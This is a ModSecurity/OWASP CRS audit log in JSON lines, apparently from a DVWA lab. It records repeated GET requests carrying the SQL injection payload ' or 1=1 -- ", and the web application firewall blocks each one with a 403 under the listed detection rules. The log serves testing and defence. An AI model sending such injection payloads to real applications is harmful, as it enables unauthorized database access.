{"transaction":{"time":"13/May/2017:12:31:50 --0400","transaction_id":"WRc09n8AAQEAAAkZ0BYAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":619,"p2":3338,"p3":0,"p4":0,"p5":174,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:53 --0400","transaction_id":"WRc0@X8AAQEAAAkZ0BcAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":414,"p2":2106,"p3":0,"p4":0,"p5":161,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:55 --0400","transaction_id":"WRc0@38AAQEAAAkZ0BgAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=95","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":408,"p2":2071,"p3":0,"p4":0,"p5":167,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:57 --0400","transaction_id":"WRc0-X8AAQEAAAkZ0BkAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=94","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 